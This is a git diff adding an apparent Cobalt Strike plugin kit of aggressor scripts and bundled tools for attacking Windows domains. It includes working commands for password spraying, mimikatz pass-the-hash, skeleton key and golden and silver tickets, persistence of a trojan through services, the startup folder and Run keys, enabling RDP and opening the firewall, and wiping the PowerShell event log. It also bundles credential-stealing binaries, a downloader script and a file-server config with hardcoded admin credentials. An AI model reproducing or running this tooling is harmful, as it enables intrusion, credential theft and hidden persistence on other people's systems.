+btask($bid, " ", ""); +btask($bid, "Port scan, supports tcp, icmp:", ""); +btask($bid, " TailorScan.exe portscan 192.168.0.1/24 80,8080 tcp", ""); +btask($bid, " TailorScan.exe portscan 192.168.0.1/24 tcp", ""); btask($bid, " ", ""); btask($bid, "Eternal Blue Detection:", ""); btask($bid, " TailorScan.exe ms17010 -i 192.168.0.1", ""); btask($bid, " TailorScan.exe ms17010 -n 192.168.0.1/24", ""); btask($bid, " ", ""); btask($bid, "OXID Find:", ""); btask($bid, " TailorScan.exe oxidfind -i 192.168.0.1", ""); btask($bid, " TailorScan.exe oxidfind -n 192.168.0.1/24", ""); +btask($bid, " ", ""); +btask($bid, "ICMP check:", ""); +btask($bid, " TailorScan.exe icmpcheck 192.168.0.1/24", ""); +btask($bid, " ", ""); +$dialog = dialog("Run TailorScan",%(exec => "TailorScan.exe ms17010 -n 192.168.0.1/24", bid => $bid),&TailorScan_run); +dialog_description($dialog, "Pay attention to the instructions for use of the console output, and enter the execution command directly below:"); +drow_text($dialog, "exec", "Exec: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub TailorScan_run{ +$exec = $3['exec']; +bshell($bid, "$exec"); +} +item "Delete TailorScan"{ +$bid = $1['@']; +bshell($bid, "taskkill -f /im TailorScan.exe & del /f /s /q TailorScan.exe"); +} +} + +item "SharpSpray (Domain Password Explosion)" { +$bid = $1['@']; +$dialog = dialog("SharpSpray", %(passwd => "123,888",Delay => "1000",Sleep => "1",bid => $bid), &SharpSpray); +dialog_description($dialog, "Use LDAP to perform password spray attack on all users in the domain. seeds: specify several password generation dictionaries, separated by commas. passwords: specify password blasting, multiple passwords can be separated by commas. delay: password spray delay, in milliseconds. sleep: The number of minutes between password guesses. Project address: https://github.com/jnqpblc/SharpSpray"); +drow_combobox($dialog, "type", "type:", @("--Seeds","--Passwords")); +drow_text($dialog, "passwd", "passwd: "); +drow_text($dialog, "Delay", "Delay: "); +drow_text($dialog, "Sleep", "Sleep: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub SharpSpray { +$arg = join(' ', @($3['type'],$3['passwd'],"--Sleep",$3['Sleep'],"--Delay",$3['Delay'])); +bexecute_assembly($bid, script_resource("/scripts/Intranet scanning/SharpSpray.exe"), $arg); } item "Mimikatz-pth"{ local('$bid'); foreach $bid ($1){ mimikatz_passthehash($bid); } } sub mimikatz_passthehash{ $bid = $1; $dialog = dialog("Pass-The-Hash" , %(beacon => $1 , domain => "xxx.com" , user => "administrator" , hash => "hash") , lambda({ bpassthehash($3["beacon"] , $3["domain"] , $3["user"] , $3["hash"]); })); dialog_description($dialog, "mimikatz pass-the-hash attack."); drow_text($dialog, "beacon", "Beacon:"); drow_text($dialog, "domain", "Domain:"); drow_text($dialog, "user", "User:"); drow_text($dialog, "hash", "Hash:"); dbutton_action($dialog, "Launch"); dialog_show($dialog); } } \ No newline at end of file diff --git a/English/modules/Locate AD.cna b/English/modules/Locate AD.cna new file mode 100644 index 0000000..3b58589 --- /dev/null +++ b/English/modules/Locate AD.cna @@ -0,0 +1,33 @@ +menu "Locate Domain Admin" { +menu "PsLoggedon" { +item "Upload PsLoggedon" { +$bid = $1; +$dialog = dialog("Upload PsLoggedon", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &PsLoggedon); +dialog_description($dialog, "Microsoft official tool, some functions of this tool require administrator privileges. Project address: https://docs.microsoft.com/zh-cn/sysinternals/downloads/psloggedon"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub PsLoggedon{ +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Locate AD/PsLoggedon.exe")); +} +item "Run PsLoggedon"{ bshell($bid, "PsLoggedon64.exe"); } item "DeletePsLoggedon"{ local('$bid'); foreach $bid ($1){ bshell($1, "del /f /s /q PsLoggedon.exe"); } } } item "PVEFindADUser" { bexecute_assembly($1, script_resource("/scripts/Locate AD/PVEFindADUser.exe"),"-current"); bshell($1, "del /f /s /q report.csv"); } menu "netview" { item "upload netview" { $bid = $1; $dialog = dialog("Upload netview", %(UploadPath => "C:\\Users\\Public\\", bid => $bid), &netview); dialog_description($dialog, "Most functions do not require administrator privileges. Project address: https://github.com/mubix/netview"); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub netview { +bcd($bid, $3['UploadPath']); +bupload($bid, script_resource("/scripts/Locate AD/netview.exe")); +} +item "Run netview"{ +$bid = $1['@']; +$Dialog = dialog("Run netview",%(domain => "xxx.com",bid => $bid),&netview_run); +drow_text($Dialog, "domain", "domain: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub netview_run{ +local('$Name'); +$Name = $3['domain']; bshell($bid, "netview.exe $+ $Name"); } item "delete netview"{ local('$bid'); foreach $bid ($1){ bshell($1, "del /f /s /q netview.exe"); } } } } \ No newline at end of file diff --git a/English/modules/Permission retention.cna b/English/modules/Permission retention.cna new file mode 100644 index 0000000..d2b51b4 --- /dev/null +++ b/English/modules/Permission retention.cna @@ -0,0 +1,135 @@ +menu "Permission maintenance" { +item "Skeleton Key"{ +$bid = $1['@']; +bmimikatz($bid , "misc::skeleton"); +} + +item "Silver Ticket" { +$bid = $1['@']; +$dialog = dialog("Silver Ticket", %(user => "administrator", domain => "xxxx.com", sid => "sid", target => "dc.xxxx.com", rc4 => "NTLM", service => "cifs", bid => $bid), &SilverTicket); +dialog_description($dialog, "To generate a silver ticket, the attacker must obtain the target service account's password ntml-hash value."); +drow_text($dialog, "domain", "Domain name: "); +drow_text($dialog, "sid", "sid: "); +drow_text($dialog, "target", "Target host name: "); +drow_text($dialog, "rc4", "NTLM-hash: "); +drow_text($dialog, "service", "Fake service: "); +drow_text($dialog, "user", "Fake user name: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} + sub SilverTicket { $user = $3['user']; $domain = $3['domain']; $sid = $3['sid']; $target = $3['target']; $rc4 = $3['rc4']; $service = $3['service']; bmimikatz($bid, "kerberos::golden /domain:$domain /sid:$sid /target:$target /rc4:$rc4 /service:$service /user:$user /ptt exit"); } item "gold note" { $bid = $1['@']; $dialog = dialog("Golden Ticket", %(admin => "administrator", domain => "xxxx.com", sid => "sid", krbtgt => "NTLM", bid => $bid), &GoldenTicket ); dialog_description($dialog, "To generate a golden ticket, the attacker must obtain the ntml-hash value of the krbtgt account."); +drow_text($dialog, "admin", "Fake username: "); +drow_text($dialog, "domain", "Domain name: " ); +drow_text($dialog, "sid", "sid: "); +drow_text($dialog, "krbtgt", "krbtgt NTLM-hash: "); +dbutton_action($dialog, "Run"); +dialog_show($dialog) ; +} +sub GoldenTicket { +$admin = $3['admin']; +$domain = $3['domain']; +$sid = $3['sid']; +$krbtgt = $3['krbtgt']; +bmimikatz($bid, "kerberos::golden /admin:$admin /domain:$domain /sid:$sid /krbtgt:$krbtgt /ptt exit"); +} + + menu "Self-start" { +item "Transfer horse" { +$bid = $1; +$dialog = dialog("Upload your horse", %(FileName => "/Users/zjun/Downloads/ma.exe", UploadPath => "C:\\Users\\Public\\", bid => $bid), &upload); +dialog_description($dialog, "Upload your horse"); +drow_text($dialog, "FileName", "Local path: "); +drow_text($dialog, "UploadPath", "Upload path: "); +dbutton_action($dialog, "Upload"); +dialog_show($dialog); +} +sub upload { +bcd($bid, $3['UploadPath']); +bupload($bid, $3['FileName']); +} +menu "Self-start service" { +item "Create self-start service" { +$bid = $1['@']; +$dialog = dialog("Create a self-starting service", %(service => "dwm", program => "C:\\Users\\Public\\ma.exe", bid => $bid), &auto); +drow_text($dialog, "service", "Create service name: "); +drow_text($dialog, "program", "Program path: "); +dialog_description($dialog, "Add service to run automatically."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub auto { +$service = $3['service']; +$program = $3['program']; +bshell($bid, "sc create $service binPath= $program start= auto"); +} +item "Delete self-starting service" { +$bid = $1['@']; +$dialog = dialog("Delete self-starting service", %(service => "dwm", bid => $bid), &del); +drow_text($dialog, "service", "Service name: "); +dialog_description($dialog, "Delete the auto-start service. "); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub del{ +$service = $3['service']; +bshell($bid, "sc delete $service"); +} +} +menu "Startup folder" { +item "Copy to startup folder" { +$bid = $1['@']; +$dialog = dialog("Copy to startup folder", %(program => "C:\\Users\\Public\\ma.exe", user => "administrator", bid => $bid), &auto); +drow_text($dialog, "program", "Program path: "); +drow_text($dialog, "user", "User name: "); +dialog_description($dialog, "Copy to startup folder."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} + sub auto { +$program = $3['program']; +$user = $3['user']; +bshell($bid, "copy \"$program\" \"C:\\Users\\$user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\""); +} +item "Delete the auto-start folder program" { +$bid = $1['@']; +$dialog = dialog("Delete the auto-start service", %(program => "dwm", bid => $bid), &del); +drow_text($dialog, "service", "Service name: "); +dialog_description($dialog, "Delete the auto-start service."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub del{ +$service = $3['service']; +bshell($bid, "sc delete $service"); +} +} +menu "Add registry to achieve auto-start" { +item "Add registry to achieve self-start" { +$bid = $1['@']; +$dialog = dialog("Add registry to achieve self-start", %(program => "C:\\Users\\Public\\ma.exe", name =>"start", bid => $bid), &auto); +drow_text($dialog, "program", "Program path: "); +drow_text($dialog, "name", "Name: "); +dialog_description($dialog, "Add registry to achieve self-start."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub auto { +$program = $3['program']; +$name = $3['name']; +bshell($bid, "reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"$name\" /d \"$program\" /f"); +} +item "Delete registry auto-start" { +$bid = $1['@']; +$dialog = dialog("Delete registry auto-start", %(name => "start", bid => $bid), &del); +drow_text($dialog, "name", "Name: "); +dialog_description($dialog, "Delete registry auto-start."); +dbutton_action($dialog, "Run"); +dialog_show($dialog); +} +sub del{ +$name = $3['name']; +bshell($bid, "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"$name\" /f"); +} +} +} +} \ No newline at end of file diff --git a/English/modules/RDP.cna b/English/modules/RDP.cna new file mode 100644 index 0000000..48c773f --- /dev/null +++ b/English/modules/RDP.cna @@ -0,0 +1,47 @@ +menu "RDP related" { +item "Get RDP port" { +local('$bid'); +foreach $bid ($1){ +blog($1, "Check Rdp Open Port"); +bpowershell_import($bid, script_resource("/scripts/RDP/RegRdpPort.ps1")); +bpowerpick($bid,"RegRdpPort"); +bshell($bid,"wevtutil cl \"Windows PowerShell\""); +} +} +item "Check whether RDP is enabled" { +blog($1, "Please execute manually: shell netstat -ano | findstr \$RDP port") +} + +item "Enable RDP service" { +$bid = $1['@']; +bshell($bid, "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f"); +bshell($bid, "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1"); +} + +item "Close RDP service" { +$bid = $1['@']; +bshell($bid, "REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 1 /f"); +bshell($bid, "wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0"); +} + +item "Force online users to log off" { +$bid = $1['@']; +bshell($bid,"query user"); +$Dialog = dialog("Force online users to log off",%(ID => "",bid => $bid),&logoff); +dialog_description($Dialog, "Pay attention to the console output and fill in the ID number."); +drow_text($Dialog, "ID", "id: "); +dbutton_action($Dialog, "Run"); +dialog_show($Dialog); +} +sub logoff{ +local('$ID'); +$ID = $3['id']; +bshell($bid, "logoff $ID"); +} + +item "Firewall RDP Release Rule" { +$bid = $1['@']; +bshell($bid, "netsh advfirewall firewall add rule name=\"Remote Desktop\" protocol=TCP dir=in localport=3389 action=allow"); +} + +} \ No newline at end of file diff --git a/English/scripts/Add user/NetUser.exe b/English/scripts/Add user/NetUser.exe new file mode 100644 index 0000000..b0a9317 Binary files /dev/null and b/English/scripts/Add user/NetUser.exe differ diff --git a/English/scripts/Add user/bof_net_user.o b/English/scripts/Add user/bof_net_user.o new file mode 100644 index 0000000..0360b59 Binary files /dev/null and b/English/scripts/Add user/bof_net_user.o differ diff --git a/English/scripts/Auxiliary/SharpOSS.exe b/English/scripts/Auxiliary/SharpOSS.exe new file mode 100644 index 0000000..fffceb3 Binary files /dev/null and b/English/scripts/Auxiliary/SharpOSS.exe differ diff --git a/English/scripts/Auxiliary/SharpZip.exe b/English/scripts/Auxiliary/SharpZip.exe new file mode 100644 index 0000000..1b39436 Binary files /dev/null and b/English/scripts/Auxiliary/SharpZip.exe differ diff --git a/English/scripts/Auxiliary/download.vbs b/English/scripts/Auxiliary/download.vbs new file mode 100644 index 0000000..85a7e44 --- /dev/null +++ b/English/scripts/Auxiliary/download.vbs @@ -0,0 +1,67 @@ +dim url +dim file +Set objArgs = WScript.Arguments +if objArgs.Count < 2 then + msgbox("Invalid param count! should be: url pathfilename") +Else + url = objArgs(0) + file = objArgs(1) + GetHttpResult url, "UTF-8", file +end if + + +function GetHttpResult(url, charset, file) + dim http + set http = Createobject("Msxml2.ServerXMLHTTP") + Http.setTimeouts 10000, 10000, 10000, 10000 'ÉèÖó¬Ê±Ê±¼ä + 'Sub setTimeouts(ByVal resolveTimeout As Long, ByVal connectTimeout As Long, ByVal sendTimeout As Long, ByVal receiveTimeout As Long) + + http.Open "GET", url, False + 'Sub open(ByVal bstrMethod As String, ByVal bstrUrl As String, [ByVal varAsync], [ByVal bstrUser], [ByVal bstrPassword]) + + http.Send() + + If http.readystate = 4 Then + GetHttpResult = SaveToFile(http.ResponseBody, charset, file) + End If + +end function + +Function SaveToFile(str, charset, file) + Dim objStream + Set objStream = CreateObject("Adodb.Stream") + + objStream.Type = 1 + 'Const adTypeBinary = 1 + 'Const adTypeText = 2 + + objStream.Mode = 3 + 'Const adModeRead = 1 + 'Const adModeReadWrite = 3 + 'Const adModeRecursive = 4194304 + 'Const adModeShareDenyNone = 16 + 'Const adModeShareDenyRead = 4 + 'Const adModeShareDenyWrite = 8 + 'Const adModeShareExclusive = 12 + 'Const adModeUnknown = 0 + 'Const adModeWrite = 2 + + + objStream.Open + objStream.Write str + objStream.Position = 0 + + objStream.Type = 2 + 'adTypeBinary = 1 + 'adTypeText = 2 + + objStream.Charset = charset +' BytesToStr = objStream.ReadText + + objStream.SaveToFile file, 2 + 'adSaveCreateNotExist = 1 + 'adSaveCreateOverWrite = 2 + + objStream.Close + Set objStream = Nothing +End Function \ No newline at end of file diff --git a/English/scripts/Grab password/BrowserGhost.exe b/English/scripts/Grab password/BrowserGhost.exe new file mode 100644 index 0000000..9153205 Binary files /dev/null and b/English/scripts/Grab password/BrowserGhost.exe differ diff --git a/English/scripts/Grab password/CredPhisher.exe b/English/scripts/Grab password/CredPhisher.exe new file mode 100644 index 0000000..0d2202b Binary files /dev/null and b/English/scripts/Grab password/CredPhisher.exe differ diff --git a/English/scripts/Grab password/FakeLogonScreenToFile.exe b/English/scripts/Grab password/FakeLogonScreenToFile.exe new file mode 100644 index 0000000..7d75559 Binary files /dev/null and b/English/scripts/Grab password/FakeLogonScreenToFile.exe differ diff --git a/English/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe b/English/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe new file mode 100644 index 0000000..8cc2c3a Binary files /dev/null and b/English/scripts/Grab password/Net-GPPPassword_dotNET_v2.exe differ diff --git a/English/scripts/Grab password/SharpChromium.exe b/English/scripts/Grab password/SharpChromium.exe new file mode 100644 index 0000000..c5abca2 Binary files /dev/null and b/English/scripts/Grab password/SharpChromium.exe differ diff --git a/English/scripts/Grab password/SharpCloud.exe b/English/scripts/Grab password/SharpCloud.exe new file mode 100644 index 0000000..2e430a1 Binary files /dev/null and b/English/scripts/Grab password/SharpCloud.exe differ diff --git a/English/scripts/Grab password/SharpDecryptPwd.exe b/English/scripts/Grab password/SharpDecryptPwd.exe new file mode 100644 index 0000000..de4722d Binary files /dev/null and b/English/scripts/Grab password/SharpDecryptPwd.exe differ diff --git a/English/scripts/Grab password/SharpDecryptPwd40.exe b/English/scripts/Grab password/SharpDecryptPwd40.exe new file mode 100644 index 0000000..7664850 Binary files /dev/null and b/English/scripts/Grab password/SharpDecryptPwd40.exe differ diff --git a/English/scripts/Grab password/SharpWifiGrabber.exe b/English/scripts/Grab password/SharpWifiGrabber.exe new file mode 100644 index 0000000..f1afbad Binary files /dev/null and b/English/scripts/Grab password/SharpWifiGrabber.exe differ diff --git a/English/scripts/Grab password/hack-browser-data.exe b/English/scripts/Grab password/hack-browser-data.exe new file mode 100644 index 0000000..a58b8fd Binary files /dev/null and b/English/scripts/Grab password/hack-browser-data.exe differ diff --git a/English/scripts/Grab password/lock-screen.ps1 b/English/scripts/Grab password/lock-screen.ps1 new file mode 100644 index 0000000..acf90db --- /dev/null +++ b/English/scripts/Grab password/lock-screen.ps1 @@ -0,0 +1,14 @@ +Function Lock-WorkStation { + +$signature = @" +[DllImport("user32.dll", SetLastError = true)] +public static extern bool LockWorkStation(); +"@ + +$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru + +$LockWorkStation::LockWorkStation() | Out-Null + +} + +Lock-WorkStation \ No newline at end of file diff --git a/English/scripts/Information collection/AdFind.exe b/English/scripts/Information collection/AdFind.exe new file mode 100644 index 0000000..1cfe1c9 Binary files /dev/null and b/English/scripts/Information collection/AdFind.exe differ diff --git a/English/scripts/Information collection/SharpAVKB.exe b/English/scripts/Information collection/SharpAVKB.exe new file mode 100644 index 0000000..d436493 Binary files /dev/null and b/English/scripts/Information collection/SharpAVKB.exe differ diff --git a/English/scripts/Information collection/SharpChassisType.exe b/English/scripts/Information collection/SharpChassisType.exe new file mode 100644 index 0000000..e9da22c Binary files /dev/null and b/English/scripts/Information collection/SharpChassisType.exe differ diff --git a/English/scripts/Information collection/SharpCheckInfo.exe b/English/scripts/Information collection/SharpCheckInfo.exe new file mode 100644 index 0000000..28069aa Binary files /dev/null and b/English/scripts/Information collection/SharpCheckInfo.exe differ diff --git a/English/scripts/Information collection/SharpClipHistory.exe b/English/scripts/Information collection/SharpClipHistory.exe new file mode 100644 index 0000000..c85fc0e Binary files /dev/null and b/English/scripts/Information collection/SharpClipHistory.exe differ diff --git a/English/scripts/Information collection/SharpDir.exe b/English/scripts/Information collection/SharpDir.exe new file mode 100644 index 0000000..2764b7c Binary files /dev/null and b/English/scripts/Information collection/SharpDir.exe differ diff --git a/English/scripts/Information collection/SharpEDRChecker.exe b/English/scripts/Information collection/SharpEDRChecker.exe new file mode 100644 index 0000000..db80a9c Binary files /dev/null and b/English/scripts/Information collection/SharpEDRChecker.exe differ diff --git a/English/scripts/Information collection/SharpEventLog.exe b/English/scripts/Information collection/SharpEventLog.exe new file mode 100644 index 0000000..4ba6dea Binary files /dev/null and b/English/scripts/Information collection/SharpEventLog.exe differ diff --git a/English/scripts/Information collection/SharpSQLDump.exe b/English/scripts/Information collection/SharpSQLDump.exe new file mode 100644 index 0000000..1b97b4c Binary files /dev/null and b/English/scripts/Information collection/SharpSQLDump.exe differ diff --git a/English/scripts/Information collection/SharpWebScan.exe b/English/scripts/Information collection/SharpWebScan.exe new file mode 100644 index 0000000..17f2977 Binary files /dev/null and b/English/scripts/Information collection/SharpWebScan.exe differ diff --git a/English/scripts/Information collection/everything/Everything.exe b/English/scripts/Information collection/everything/Everything.exe new file mode 100644 index 0000000..5bbff59 Binary files /dev/null and b/English/scripts/Information collection/everything/Everything.exe differ diff --git a/English/scripts/Information collection/everything/Everything.ini b/English/scripts/Information collection/everything/Everything.ini new file mode 100644 index 0000000..883e519 --- /dev/null +++ b/English/scripts/Information collection/everything/Everything.ini @@ -0,0 +1,737 @@ +; Please make sure Everything is not running before modifying this file. +[Everything] +run_as_admin=1 +allow_http_server=1 +allow_etp_server=1 +window_x=198 +window_y=89 +window_wide=785 +window_high=650 +maximized=0 +minimized=0 +fullscreen=0 +ontop=0 +bring_into_view=1 +alpha=255 +match_whole_word=0 +match_path=0 +match_case=0 +match_diacritics=0 +match_regex=0 +view=0 +thumbnail_size=64 +thumbnail_fill=0 +min_thumbnail_size=32 +max_thumbnail_size=256 +medium_thumbnail_size=64 +large_thumbnail_size=128 +extra_large_thumbnail_size=256 +thumbnail_load_size=0 +thumbnail_overlay_icon=1 +shell_max_path=0 +allow_multiple_windows=0 +allow_multiple_instances=0 +run_in_background=1 +show_in_taskbar=1 +show_tray_icon=1 +minimize_to_tray=0 +toggle_window_from_tray_icon=0 +alternate_row_color=0 +show_mouseover=0 +check_for_updates_on_startup=0 +beta_updates=0 +show_highlighted_search_terms=1 +text_size=0 +hide_empty_search_results=0 +clear_selection_on_search=1 +show_focus_on_search=0 +new_window_key=0 +show_window_key=0 +toggle_window_key=0 +language=0 +show_selected_item_in_statusbar=1 +statusbar_selected_item_format= +show_size_in_statusbar=0 +statusbar_size_format=0 +open_folder_command2= +open_file_command2= +open_path_command2= +explore_command2= +explore_path_command2= +window_title_format= +taskbar_notification_title_format= +instance_name= +translucent_selection_rectangle_alpha=70 +min_zoom=-6 +max_zoom=27 +context_menu_type=0 +context_menu_shell_extensions=1 +auto_include_fixed_volumes=1 +auto_include_removable_volumes=0 +auto_remove_offline_ntfs_volumes=1 +auto_remove_moved_ntfs_volumes=1 +auto_include_fixed_refs_volumes=1 +auto_include_removable_refs_volumes=0 +auto_remove_offline_refs_volumes=1 +auto_remove_moved_refs_volumes=1 +find_mount_points_on_removable_volumes=0 +last_export_type=0 +max_threads=0 +reuse_threads=1 +find_subfolders_and_files_max_threads=0 +single_parent_context_menu=0 +auto_size_1=512 +auto_size_2=640 +auto_size_3=768 +auto_size_aspect_ratio_x=9 +auto_size_aspect_ratio_y=7 +auto_size_width_only=0 +auto_size_path_x=1 +auto_size_path_y=2 +sticky_vscroll_bottom=1 +last_options_page=17 +draw_focus_rect=1 +date_format= +time_format= +listview_item_high=0 +single_click_open=0 +underline_icon_titles=0 +icons_only=0 +icon_shell_extensions=1 +auto_scroll_repeat_delay=250 +auto_scroll_repeat_rate=50 +open_many_files_warning_threshold=16 +set_foreground_window_attach_thread_input=0 +debug=0 +debug_log=0 +verbose=0 +lvm=1 +ipc=1 +home_match_case=0 +home_match_whole_word=0 +home_match_path=0 +home_match_diacritics=0 +home_regex=0 +home_search=1 +home_filter=0 +home_sort=0 +home_view=0 +home_index=1 +allow_multiple_windows_from_tray=0 +single_click_tray=0 +close_on_execute=0 +double_click_path=0 +update_display_after_scroll=0 +update_display_after_mask=1 +auto_scroll_view=0 +double_quote_copy_as_path=0 +snap=0 +snaplen=10 +rename_select_filepart_only=0 +rename_move_caret_to_selection_end=0 +rename_nav=0 +search_edit_move_caret_to_selection_end=0 +search_edit_drag_accept_files=0 +select_search_on_mouse_click=1 +focus_search_on_activate=0 +reset_vscroll_on_search=1 +wrap_focus=0 +load_icon_priority=0 +load_thumbnail_priority=0 +load_fileinfo_priority=0 +always_request_all_fileinfo=0 +header_high=0 +hide_on_close=0 +max_hidden_windows=0x00000000 +winmm=0 +menu_escape_amp=1 +menu_folders=0 +menu_folder_separator= +menu_items_per_column=0 +new_inherit=1 +full_row_select=0 +tray_show_command_line= +dpi=96 +ctrl_mouse_wheel_action=1 +allow_open=1 +allow_context_menu=1 +allow_delete=1 +allow_rename=1 +allow_cut=1 +allow_copy=1 +allow_paste=1 +allow_drag_drop=1 +allow_window_message_filter_dragdrop=0 +auto_column_widths=0 +hotkey_explorer_path_search=0 +get_key_name_text=1 +paste_new_line_op=0 +esc_cancel_action=1 +fast_ascii_search=1 +match_path_when_search_contains_path_separator=1 +allow_literal_operators=0 +allow_round_bracket_parenthesis=0 +expand_environment_variables=0 +search_as_you_type=1 +always_update_query_on_search_parameter_change=0 +convert_forward_slash_to_backslash=0 +match_whole_filename_when_using_wildcards=1 +operator_precedence=0 +replace_exact_trailing_star_dot_star_with_star=1 +allow_exclamation_point_not=1 +search_command_prefix= +auto_complete_search_command=1 +double_buffer=1 +search= +show_number_of_results_with_selection=0 +date_descending_first=0 +size_descending_first=0 +size_format=2 +alpha_select=0 +tooltips=1 +listview_tooltips=1 +show_detailed_listview_tooltips=1 +rtl_listview_edit=0 +force_path_ltr_order=1 +force_path_left_align=1 +date_time_order=0 +date_time_align=1 +size_align=3 +invert_layout=0 +update_layout_on_input_language_change=0 +control_shift_action=3 +change_search_rtl_reading_action=3 +invert_layout_action=3 +bookmark_remember_case=1 +bookmark_remember_wholeword=1 +bookmark_remember_path=1 +bookmark_remember_diacritic=1 +bookmark_remember_regex=1 +bookmark_remember_sort=1 +bookmark_remember_view=1 +bookmark_remember_filter=1 +bookmark_remember_index=1 +bookmark_remember_search=1 +bookmark_organize_x=0 +bookmark_organize_y=0 +bookmark_organize_wide=0 +bookmark_organize_high=0 +exclude_list_enabled=1 +exclude_hidden_files_and_folders=0 +exclude_system_files_and_folders=0 +include_only_files= +exclude_files= +db_location= +db_multi_user_filename=0 +db_compress=0 +index_size=1 +fast_size_sort=1 +index_date_created=0 +fast_date_created_sort=0 +index_date_modified=1 +fast_date_modified_sort=1 +index_date_accessed=0 +fast_date_accessed_sort=0 +index_attributes=0 +fast_attributes_sort=0 +index_folder_size=0 +fast_path_sort=1 +fast_extension_sort=0 +extended_information_cache_monitor=1 +db_update_thread_priority=-15 +index_recent_changes=1 +refs_file_id_extd_directory_info_buffer_size=0 +folder_update_thread_mode_background=0 +folder_update_rescan_asap=1 +monitor_thread_mode_background=1 +monitor_retry_delay=30000 +monitor_update_delay=1000 +monitor_pause=0 +usn_record_filter=0xffffffff +cancel_delay=0x000003e8 +allow_ntfs_open_file_by_id=1 +always_update_folder_recent_change=0 +editor_x=0 +editor_y=0 +editor_wide=0 +editor_high=0 +editor_maximized=0 +file_list_relative_paths=0 +rename_x=0 +rename_y=0 +rename_wide=0 +rename_high=0 +rename_match_case=0 +rename_regex=0 +advanced_copy_to_x=0 +advanced_copy_to_y=0 +advanced_copy_to_wide=0 +advanced_copy_to_high=0 +advanced_copy_to_match_case=0 +advanced_copy_to_regex=0 +advanced_move_to_x=0 +advanced_move_to_y=0 +advanced_move_to_wide=0 +advanced_move_to_high=0 +advanced_move_to_match_case=0 +advanced_move_to_regex=0 +advanced_search_x=0 +advanced_search_y=0 +advanced_search_wide=0 +advanced_search_high=0 +advanced_search_page_y_offset=0 +advanced_search_focus_id=0 +advanced_search_warnings=1 +max_recv_size=8388608 +display_full_path_name=0 +size_tiny=10240 +size_small=102400 +size_medium=1048576 +size_large=16777216 +size_huge=134217728 +themed_toolbar=1 +show_copy_name=2 +show_copy_path=2 +show_copy_full_name=2 +show_open_path=2 +show_explore=2 +show_explore_path=2 +copy_path_folder_append_backslash=0 +custom_verb01= +custom_verb02= +custom_verb03= +custom_verb04= +custom_verb05= +custom_verb06= +custom_verb07= +custom_verb08= +custom_verb09= +custom_verb10= +custom_verb11= +custom_verb12= +filters_visible=0 +filters_wide=128 +filters_right_align=1 +filters_tab_stop=0 +filter= +filter_everything_name= +filter_organize_x=0 +filter_organize_y=0 +filter_organize_wide=0 +filter_organize_high=0 +preview_visible=0 +preview_x=640 +preview_tab_stop=0 +preview_mag_filter=0 +preview_min_filter=0 +preview_fill=0 +show_preview_handlers_in_preview_pane=0 +preview_load_size=0 +preview_context=0x00000000 +preview_release_handler_on_clear=0 +sort=Run Count +sort_ascending=0 +always_keep_sort=0 +index=0 +index_file_list= +index_etp_server= +index_link_type=1 +status_bar_visible=1 +select_search_on_focus_mode=1 +select_search_on_set_mode=2 +search_history_enabled=0 +run_history_enabled=1 +search_history_days_to_keep=90 +run_history_days_to_keep=90 +search_history_keep_forever=1 +run_history_keep_forever=1 +search_history_always_suggest=0 +search_history_always_suggest_extend_toolbar=0 +search_history_visible_count_max=12 +search_history_always_suggest_visible_count_max=1 +search_history_show_all_max=256 +search_history_suggestion_max=256 +search_history_show_all_sort=2 +search_history_suggestion_sort=1 +search_history_show_above=0 +search_history_sort=2 +search_history_sort_ascending=0 +search_history_x=0 +search_history_y=0 +search_history_wide=0 +search_history_high=0 +search_history_column_search_wide=208 +search_history_column_search_order=0 +search_history_column_count_wide=128 +search_history_column_count_order=1 +search_history_column_date_wide=128 +search_history_column_date_order=2 +etp_server_enabled=0 +etp_server_bindings= +etp_server_port=21 +etp_server_username= +etp_server_password= +etp_server_welcome_message= +etp_server_log_file_name= +etp_server_logging_enabled=0 +etp_server_log_max_size=4194304 +etp_server_log_delta_size=524288 +etp_server_allow_file_download=1 +ftp_allow_port=1 +ftp_check_data_connection_ip=1 +http_server_enabled=1 +http_server_bindings=0.0.0.0 +http_title_format= +http_server_port=65535 +http_server_username=admin +http_server_password=admin@123 +http_server_home= +http_server_default_page= +http_server_log_file_name= +http_server_logging_enabled=0 +http_server_log_max_size=419430400 +http_server_log_delta_size=524288 +http_server_allow_file_download=1 +http_server_items_per_page=32 +http_server_show_drive_labels=0 +http_server_strings= +http_server_access_control_allow_origin= +service_pipe_name= +name_column_pos=0 +name_column_width=256 +path_column_visible=1 +path_column_pos=1 +path_column_width=256 +size_column_visible=1 +size_column_pos=2 +size_column_width=96 +extension_column_visible=0 +extension_column_pos=3 +extension_column_width=96 +type_column_visible=0 +type_column_pos=4 +type_column_width=96 +last_write_time_column_visible=1 +last_write_time_column_pos=3 +last_write_time_column_width=153 +creation_time_column_visible=0 +creation_time_column_pos=6 